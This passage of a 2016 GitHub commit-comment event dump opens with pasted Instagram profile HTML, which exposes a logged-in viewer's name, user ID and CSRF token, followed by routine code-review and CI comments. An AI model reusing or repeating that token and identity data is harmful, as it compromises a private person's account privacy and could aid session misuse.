//instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.eot/115b1f7f9c04.eot?#iefix') format(\"embedded-opentype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.woff/618250d25a4d.woff') format(\"woff\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.ttf/646346e03084.ttf') format(\"truetype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-bold-webfont.svg/e55a9d6051e8.svg#ProximaNovaBold') format(\"svg\");\r\nfont-weight: bold;\r\nfont-style: normal; }\r\n\r\n@font-face {\r\nfont-family: 'proxima-nova';\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.eot/1cbb869da891.eot');\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.eot/1cbb869da891.eot?#iefix') format(\"embedded-opentype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.woff/b1cf049474c9.woff') format(\"woff\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.ttf/3adb020ceae3.ttf') format(\"truetype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-boldit-webfont.svg/29948a2d3c58.svg#ProximaNovaBoldItalic') format(\"svg\");\r\nfont-weight: bold;\r\nfont-style: italic; }\r\n\r\n@font-face {\r\nfont-family: 'proxima-nova';\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.eot/12af77715cee.eot');\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.eot/12af77715cee.eot?#iefix') format(\"embedded-opentype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.woff/a9a9773b8e29.woff') format(\"woff\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.ttf/99e19808976a.ttf') format(\"truetype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-reg-webfont.svg/c33d2fd56309.svg#ProximaNovaRegular') format(\"svg\");\r\nfont-weight: normal;\r\nfont-style: normal; }\r\n\r\n@font-face {\r\nfont-family: 'proxima-nova';\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.eot/1bbbd1312b0d.eot');\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.eot/1bbbd1312b0d.eot?#iefix') format(\"embedded-opentype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.woff/9e306befca91.woff') format(\"woff\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.ttf/4a8663684135.ttf') format(\"truetype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-regit-webfont.svg/876278d4b189.svg#ProximaNovaRegularItalic') format(\"svg\");\r\nfont-weight: normal;\r\nfont-style: italic; }\r\n\r\n@font-face {\r\nfont-family: 'proxima-nova';\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.eot/5016edf79e1d.eot');\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.eot/5016edf79e1d.eot?#iefix') format(\"embedded-opentype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.woff/615c1b06d8fa.woff') format(\"woff\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.ttf/2973bd483f7a.ttf') format(\"truetype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-sbold-webfont.svg/868597833e49.svg#ProximaNovaSemibold') format(\"svg\");\r\nfont-weight: 600;\r\nfont-style: normal; }\r\n</style>\r\n\r\n<style type=\"text/css\">\r\n@font-face {\r\nfont-family: 'proxima-nova';\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.eot/63c84728610f.eot');\r\nsrc: url(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.eot/63c84728610f.eot?#iefix') format(\"embedded-opentype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.woff/66bbe029f180.woff') format(\"woff\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.ttf/eb408516399b.ttf') format(\"truetype\"),\r\nurl(' //instagramstatic-a.akamaihd.net/h1/webfonts/proximanova-light-webfont.svg/858f6a9b7ef3.svg#ProximaNovaLight') format(\"svg\");\r\nfont-weight: 300;\r\nfont-style: normal; }\r\n</style>\r\n\r\n\r\n<meta name=\"robots\" content=\"noimageindex\">\r\n<meta name=\"mobile-web-app-capable\" content=\"yes\">\r\n<meta name=\"apple-mobile-web-app-capable\" content=\"yes\">\r\n<meta name=\"apple-mobile-web-app-status-bar-style\" content=\"black\">\r\n\r\n\r\n<meta id=\"viewport\" name=\"viewport\" content=\"width=device-width, user-scalable=no, initial-scale=1, minimum-scale=1, maximum-scale=1\">\r\n\r\n\r\n<script type=\"text/javascript\">\r\n(function() {\r\nvar docElement = document.documentElement;\r\nvar classRE = new RegExp('(^|\\\\s)no-js(\\\\s|$)');\r\nvar className = docElement.className;\r\ndocElement.className = className.replace(classRE, '$1js$2');\r\n})();\r\n</script>\r\n\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"76x76\" href=\"//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-76x76-precomposed.png/932e4d9af891.png\">\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"120x120\" href=\"//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-120x120-precomposed.png/004705c9353f.png\">\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"152x152\" href=\"//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-152x152-precomposed.png/82467bc9bcce.png\">\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"167x167\" href=\"//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-167x167-precomposed.png/515cb4eeeeee.png\">\r\n<link rel=\"apple-touch-icon-precomposed\" sizes=\"180x180\" href=\"//instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-180x180-precomposed.png/94fd767f257b.png\">\r\n<link rel=\"icon\" sizes=\"192x192\" href=\"//instagramstatic-a.akamaihd.net/h1/images/ico/favicon-192.png/b407fa101800.png\">\r\n<link rel=\"mask-icon\" href=\"//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.svg/9d8680ab8a3c.svg\" color=\"#262626\"><link rel=\"shortcut icon\" type=\"image/x-icon\" href=\"//instagramstatic-a.akamaihd.net/h1/images/ico/favicon.ico/dfa85bb1fd63.ico\">\r\n\r\n<link rel=\"alternate\" href=\"android-app://com.instagram.android/https/instagram.com/_u/cruelfilms/\" />\r\n<meta property=\"al:ios:app_name\" content=\"Instagram\" />\r\n<meta property=\"al:ios:app_store_id\" content=\"389801252\" />\r\n<meta property=\"al:ios:url\" content=\"instagram://user?username=cruelfilms\" />\r\n<meta property=\"al:android:app_name\" content=\"Instagram\" />\r\n<meta property=\"al:android:package\" content=\"com.instagram.android\" />\r\n<meta property=\"al:android:url\" content=\"https://www.instagram.com/_u/cruelfilms/\" />\r\n<link rel=\"canonical\" href=\"https://www.instagram.com/cruelfilms/\" /><meta content=\"Fatigue makes cowards of us all\" name=\"description\" />\r\n<meta property=\"og:type\" content=\"profile\" />\r\n<meta property=\"og:image\" content=\"https://scontent-lhr3-1.cdninstagram.com/t51.2885-19/11881591_1477086552609322_1083821478_a.jpg\" />\r\n<meta property=\"og:title\" content=\"@cruelfilms • Instagram photos and videos\" />\r\n<meta property=\"og:description\" content=\"Fatigue makes cowards of us all\" />\r\n<meta property=\"og:url\" content=\"https://www.instagram.com/cruelfilms/\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/\" rel=\"alternate\" hreflang=\"x-default\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=el\" rel=\"alternate\" hreflang=\"el\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=gu\" rel=\"alternate\" hreflang=\"gu\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=en\" rel=\"alternate\" hreflang=\"en\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=af\" rel=\"alternate\" hreflang=\"af\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=vi\" rel=\"alternate\" hreflang=\"vi\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=fr-ca\" rel=\"alternate\" hreflang=\"fr-ca\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=it\" rel=\"alternate\" hreflang=\"it\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=kn\" rel=\"alternate\" hreflang=\"kn\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=zh-hk\" rel=\"alternate\" hreflang=\"zh-hk\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=pt-br\" rel=\"alternate\" hreflang=\"pt-br\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=cs\" rel=\"alternate\" hreflang=\"cs\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=id\" rel=\"alternate\" hreflang=\"id\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=es\" rel=\"alternate\" hreflang=\"es\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ru\" rel=\"alternate\" hreflang=\"ru\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=sr\" rel=\"alternate\" hreflang=\"sr\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=nl\" rel=\"alternate\" hreflang=\"nl\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=pt\" rel=\"alternate\" hreflang=\"pt\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=zh-tw\" rel=\"alternate\" hreflang=\"zh-tw\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=nb\" rel=\"alternate\" hreflang=\"nb\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=tr\" rel=\"alternate\" hreflang=\"tr\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ne\" rel=\"alternate\" hreflang=\"ne\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=zh-cn\" rel=\"alternate\" hreflang=\"zh-cn\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=tl\" rel=\"alternate\" hreflang=\"tl\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=pa\" rel=\"alternate\" hreflang=\"pa\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=th\" rel=\"alternate\" hreflang=\"th\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=te\" rel=\"alternate\" hreflang=\"te\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=pl\" rel=\"alternate\" hreflang=\"pl\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ta\" rel=\"alternate\" hreflang=\"ta\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=fr\" rel=\"alternate\" hreflang=\"fr\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=bg\" rel=\"alternate\" hreflang=\"bg\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=uk\" rel=\"alternate\" hreflang=\"uk\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=hr\" rel=\"alternate\" hreflang=\"hr\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=bn\" rel=\"alternate\" hreflang=\"bn\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=de\" rel=\"alternate\" hreflang=\"de\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=da\" rel=\"alternate\" hreflang=\"da\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=hi\" rel=\"alternate\" hreflang=\"hi\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=fi\" rel=\"alternate\" hreflang=\"fi\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=hu\" rel=\"alternate\" hreflang=\"hu\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ja\" rel=\"alternate\" hreflang=\"ja\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ro\" rel=\"alternate\" hreflang=\"ro\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ml\" rel=\"alternate\" hreflang=\"ml\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ko\" rel=\"alternate\" hreflang=\"ko\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=sv\" rel=\"alternate\" hreflang=\"sv\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ur\" rel=\"alternate\" hreflang=\"ur\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=sk\" rel=\"alternate\" hreflang=\"sk\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=si\" rel=\"alternate\" hreflang=\"si\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=ms\" rel=\"alternate\" hreflang=\"ms\" />\r\n<link href=\"https://www.instagram.com/cruelfilms/?hl=mr\" rel=\"alternate\" hreflang=\"mr\" />\r\n\r\n</head>\r\n<body class=\"\">\r\n<span id=\"react-root\"></span>\r\n\r\n\r\n<script type=\"text/javascript\">window._sharedData = {\"country_code\": \"GB\", \"language_code\": \"en\", \"gatekeepers\": {\"sulgin\": true}, \"show_app_install\": false, \"static_root\": \"//instagramstatic-a.akamaihd.net/h1\", \"platform\": \"web\", \"hostname\": \"www.instagram.com\", \"entry_data\": {\"ProfilePage\": [{\"user\": {\"username\": \"cruelfilms\", \"follows\": {\"count\": 41}, \"requested_by_viewer\": true, \"followed_by\": {\"count\": 245}, \"country_block\": null, \"has_requested_viewer\": false, \"external_url_linkshimmed\": null, \"follows_viewer\": false, \"profile_pic_url\": \"https://scontent-lhr3-1.cdninstagram.com/t51.2885-19/11881591_1477086552609322_1083821478_a.jpg\", \"id\": \"55539697\", \"biography\": \"Fatigue makes cowards of us all\", \"full_name\": null, \"media\": {\"count\": 759}, \"blocked_by_viewer\": false, \"followed_by_viewer\": false, \"is_verified\": true, \"has_blocked_viewer\": false, \"is_private\": true, \"external_url\": null}}]}, \"qe\": {\"profile\": {\"p\": {}, \"g\": \"\"}, \"su_universe\": {\"p\": {}, \"g\": \"\"}, \"notif\": {\"p\": {\"fcn\": \"true\"}, \"g\": \"test\"}, \"us\": {\"p\": {}, \"g\": \"\"}, \"su\": {\"p\": {\"enabled\": \"true\"}, \"g\": \"test_20160322\"}, \"us_li\": {\"p\": {}, \"g\": \"\"}, \"discovery\": {\"p\": {}, \"g\": \"\"}}, \"display_properties_server_guess\": {\"viewport_width\": 1280, \"pixel_ratio\": 2.0}, \"config\": {\"viewer\": {\"username\": \"thomasdouglas97\", \"has_profile_pic\": true, \"profile_pic_url_hd\": \"https://scontent-lhr3-1.cdninstagram.com/t51.2885-19/s320x320/11931208_1538761089751699_2091223559_a.jpg\", \"profile_pic_url\": \"https://scontent-lhr3-1.cdninstagram.com/t51.2885-19/s150x150/11931208_1538761089751699_2091223559_a.jpg\", \"full_name\": \"Thomas Douglas\", \"id\": \"324071530\", \"biography\": null, \"external_url\": null}, \"csrf_token\": \"qgQuZZcqJBPh7uh9a3vFO8xFiVT9RMvm\"}, \"environment_switcher_visible_server_guess\": true};</script>\r\n<script src=\"//instagramstatic-a.akamaihd.net/h1/bundles/en_US_Commons.js/fe72543861a5.js\" type=\"text/javascript\" crossorigin=\"anonymous\"></script>\r\n<script src=\"//instagramstatic-a.akamaihd.net/h1/bundles/en_US_ProfilePage.js/8182345ec363.js\" type=\"text/javascript\" crossorigin=\"anonymous\"></script>\r\n<script>\r\n!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?\r\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;\r\nn.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;\r\nt.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,\r\ndocument,'script','//connect.facebook.net/en_US/fbevents.js');\r\n\r\nfbq('init', '1425767024389221');\r\n\r\nfbq('track', 'PageView');\r\n\r\n\r\n</script>\r\n<noscript>\r\n\r\n\r\n</noscript>\r\n\r\n<script type=\"text/javascript\">window._timings.domInteractive = Date.now()</script>\r\n\r\n</body>\r\n</html>"}},"created_at":"2016-09-15T22:26:02Z"}
{"id":"4571134126","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19045681,"position":null,"line":null,"path":null,"commit_id":"1baf20928e190562630492000c923a3ac0217c9d","created_at":"2016-09-15T22:26:22Z","updated_at":"2016-09-15T22:26:22Z","body":"FixAgainCentroidForNonConvex (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2370 of 2371 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T22:26:22Z"}
{"id":"4571134922","type":"CommitCommentEvent","actor":{"login":"fritzmg"},"repo":{"name":"contao/core"},"payload":{"comment":{"id":19045684,"position":null,"line":null,"path":null,"commit_id":"e29de00cf7d888a6c60d2db76f40ade3a7d05310","created_at":"2016-09-15T22:26:33Z","updated_at":"2016-09-15T22:26:33Z","body":"It already is: https://github.com/contao/core-bundle/commit/89e7b63bcef77466d58e66f51dca21725fad2c2f"}},"created_at":"2016-09-15T22:26:33Z"}
{"id":"4571135182","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/newconcepts"},"payload":{"comment":{"id":19045688,"position":null,"line":null,"path":null,"commit_id":"6818ea0fd9621c1d32d19c9204887413bf5ffba9","created_at":"2016-09-15T22:26:37Z","updated_at":"2016-09-15T22:26:37Z","body":"The gui can be the glue which is applied to the spectral image to adher the Qubit while it travels to its destination through dimensions."}},"created_at":"2016-09-15T22:26:37Z"}
{"id":"4571135325","type":"CommitCommentEvent","actor":{"login":"cruhland"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045690,"position":40,"line":104,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:26:39Z","updated_at":"2016-09-15T22:26:39Z","body":"Re: side effects, you mean building sets of \"seen\" IDs/names rather than removing keys from the dicts?"}},"created_at":"2016-09-15T22:26:39Z"}
{"id":"4571136632","type":"CommitCommentEvent","actor":{"login":"tamarrow"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045693,"position":29,"line":52,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:26:58Z","updated_at":"2016-09-15T22:26:58Z","body":"can we put the newline in the test file?"}},"created_at":"2016-09-15T22:26:58Z"}
{"id":"4571138826","type":"CommitCommentEvent","actor":{"login":"kevinushey"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":19045698,"position":null,"line":null,"path":null,"commit_id":"7ff696115cca8ff3162ab3cb797a3b656d16ba59","created_at":"2016-09-15T22:27:31Z","updated_at":"2016-09-15T22:27:31Z","body":"Looks great, thanks!"}},"created_at":"2016-09-15T22:27:31Z"}
{"id":"4571140578","type":"CommitCommentEvent","actor":{"login":"tamarrow"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045704,"position":38,"line":102,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:27:57Z","updated_at":"2016-09-15T22:27:57Z","body":"`parsed_stdout` then"}},"created_at":"2016-09-15T22:27:57Z"}
{"id":"4571145505","type":"CommitCommentEvent","actor":{"login":"cruhland"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045712,"position":29,"line":52,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:29:12Z","updated_at":"2016-09-15T22:29:12Z","body":"The newline is added by the emitter; there's a unit test which checks the just the string generated by the table, and that doesn't have the newline. So I'll either be adding the newline here or removing it in the unit test."}},"created_at":"2016-09-15T22:29:12Z"}
{"id":"4571146947","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045718,"position":14,"line":14,"path":"server/app/routes/friends.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:29:32Z","updated_at":"2016-09-15T22:29:32Z","body":"90% sure"}},"created_at":"2016-09-15T22:29:32Z"}
{"id":"4571147963","type":"CommitCommentEvent","actor":{"login":"hackworks"},"repo":{"name":"OnePlusOSS/android_kernel_oneplus_msm8994"},"payload":{"comment":{"id":19045719,"position":96,"line":887,"path":"drivers/usb/dwc3/dwc3_otg.c","commit_id":"ada398b71d7e24f3db71bfbe132f1c30383ba1e9","created_at":"2016-09-15T22:29:47Z","updated_at":"2016-09-15T22:29:47Z","body":"Case insensitive comparison with numbers..."}},"created_at":"2016-09-15T22:29:47Z"}
{"id":"4571151064","type":"CommitCommentEvent","actor":{"login":"claudiosmweb"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19045725,"position":13,"line":18,"path":"composer.json","commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T22:30:31Z","updated_at":"2016-09-15T22:30:31Z","body":"\"bash\" is breaking it on Linux :P\r\nBut I update it and maybe now work on Windows too."}},"created_at":"2016-09-15T22:30:31Z"}
{"id":"4571151609","type":"CommitCommentEvent","actor":{"login":"surajrav"},"repo":{"name":"freenas/freenas"},"payload":{"comment":{"id":19045726,"position":18,"line":59,"path":"src/freenas/usr/local/bin/freenas-snmp/zfs-snmp","commit_id":"977d14df48bd85ee3d84b5a3ba1c8d396c99c025","created_at":"2016-09-15T22:30:39Z","updated_at":"2016-09-15T22:30:39Z","body":"en-masse decode seems like a good idea, thanks chris"}},"created_at":"2016-09-15T22:30:39Z"}
{"id":"4571151715","type":"CommitCommentEvent","actor":{"login":"ToshMeston"},"repo":{"name":"socrata/opendatanetwork.com"},"payload":{"comment":{"id":19045727,"position":null,"line":null,"path":null,"commit_id":"639fbf741d02b5cebd800306cc9600e3a110f050","created_at":"2016-09-15T22:30:40Z","updated_at":"2016-09-15T22:30:40Z","body":"Just rewrite it."}},"created_at":"2016-09-15T22:30:40Z"}
{"id":"4571152787","type":"CommitCommentEvent","actor":{"login":"cdbfoster"},"repo":{"name":"serprex/zero_sum"},"payload":{"comment":{"id":19045729,"position":null,"line":null,"path":null,"commit_id":"d0b2fd302e95d66a8c5e1b29cef3d48dc25695a8","created_at":"2016-09-15T22:30:56Z","updated_at":"2016-09-15T22:30:56Z","body":"Actually, you've given me a thought.  The ply generator shouldn't shuffle moves returned by `state.extrapolate`.  That method should shuffle them itself only if it wants randomness.  That will allow for implementation-specific move ordering."}},"created_at":"2016-09-15T22:30:56Z"}
{"id":"4571152886","type":"CommitCommentEvent","actor":{"login":"cruhland"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045730,"position":38,"line":102,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:30:58Z","updated_at":"2016-09-15T22:30:58Z","body":"I'll rename `pods_by_id` to `actual_pods_by_id` too."}},"created_at":"2016-09-15T22:30:58Z"}
{"id":"4571154195","type":"CommitCommentEvent","actor":{"login":"mikepauer"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19045731,"position":349,"line":3013,"path":"Carbonite.Quests/NxQuest.lua","commit_id":"5c5002d75cc3e3bc5b134b68a6a8304a37d25217","created_at":"2016-09-15T22:31:16Z","updated_at":"2016-09-15T22:31:16Z","body":"The files parse in under 1s.. in fact they don't even actually need the delay they have now. The stuttering was caused by a for loop running 110 loops of the entire quest database during sorting. I originally had recordqueatslog at the end of the sorting but other parts of carb were not ready and caused errors"}},"created_at":"2016-09-15T22:31:16Z"}
{"id":"4571154400","type":"CommitCommentEvent","actor":{"login":"cruhland"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045732,"position":46,"line":110,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:31:19Z","updated_at":"2016-09-15T22:31:19Z","body":"Same here -- I'll call this `actual_containers_by_name`."}},"created_at":"2016-09-15T22:31:19Z"}
{"id":"4571154964","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19045737,"position":null,"line":null,"path":null,"commit_id":"1baf20928e190562630492000c923a3ac0217c9d","created_at":"2016-09-15T22:31:26Z","updated_at":"2016-09-15T22:31:26Z","body":"FixAgainCentroidForNonConvex (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1baf20928e190562630492000c923a3ac0217c9d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T22:31:26Z"}
{"id":"4571157090","type":"CommitCommentEvent","actor":{"login":"franbenz"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19045742,"position":6,"line":24,"path":"brunch-config.js","commit_id":"fc040a22d5d9330437999eea55c4e34188072610","created_at":"2016-09-15T22:31:58Z","updated_at":"2016-09-15T22:31:58Z","body":"@soumak77 I'm getting the warnings for `config-routes.js` during build, but the building process is not failing for errors on our project files. For example, we have a few double-quoted strings that should be single-quoted according to `.eslitrc.json`."}},"created_at":"2016-09-15T22:31:58Z"}
{"id":"4571158951","type":"CommitCommentEvent","actor":{"login":"tamarrow"},"repo":{"name":"dcos/dcos-cli"},"payload":{"comment":{"id":19045746,"position":40,"line":104,"path":"cli/tests/integrations/test_marathon_pod.py","commit_id":"e10c770d152f9b161cc2262e6fe3be60afe33293","created_at":"2016-09-15T22:32:25Z","updated_at":"2016-09-15T22:32:25Z","body":"Just asserting that the `expected` is a subset of `actual` and the # of containers is the same. "}},"created_at":"2016-09-15T22:32:25Z"}
{"id":"4571161532","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19045756,"position":15,"line":15,"path":"server/db/index.js","commit_id":"e6c0e030715ae6895035c22f014703b52354dee1","created_at":"2016-09-15T22:33:03Z","updated_at":"2016-09-15T22:33:03Z","body":"consider also `User.hasMany(Order)`"}},"created_at":"2016-09-15T22:33:03Z"}
{"id":"4571162085","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/newconcepts"},"payload":{"comment":{"id":19045760,"position":null,"line":null,"path":null,"commit_id":"6818ea0fd9621c1d32d19c9204887413bf5ffba9","created_at":"2016-09-15T22:33:12Z","updated_at":"2016-09-15T22:33:12Z","body":"The overall concept of change and the powerful commits the atomic commits and the desktop version of Github can have the ability to cherry pick and pull things individually for futuristic changes discoveries and evidence"}},"created_at":"2016-09-15T22:33:12Z"}
{"id":"4571165756","type":"CommitCommentEvent","actor":{"login":"HichamDiouri"},"repo":{"name":"HichamDiouri/TP1-partie1-INF2170"},"payload":{"comment":{"id":19045767,"position":24,"line":51,"path":"src/BlackJack.java","commit_id":"9c92e3363703218bd2f73f808975c07f152c2ca4","created_at":"2016-09-15T22:34:02Z","updated_at":"2016-09-15T22:34:02Z","body":"Arranger tab pour ces lignes ( visuel )"}},"created_at":"2016-09-15T22:34:02Z"}
{"id":"4571165974","type":"CommitCommentEvent","actor":{"login":"deepsweet"},"repo":{"name":"mhart/alpine-node"},"payload":{"comment":{"id":19045768,"position":null,"line":null,"path":null,"commit_id":"4a83deb3a76a4fef9c1698dc20125afe6af25cad","created_at":"2016-09-15T22:34:06Z","updated_at":"2016-09-15T22:34:06Z","body":"wow, that was fast 👍 "}},"created_at":"2016-09-15T22:34:06Z"}
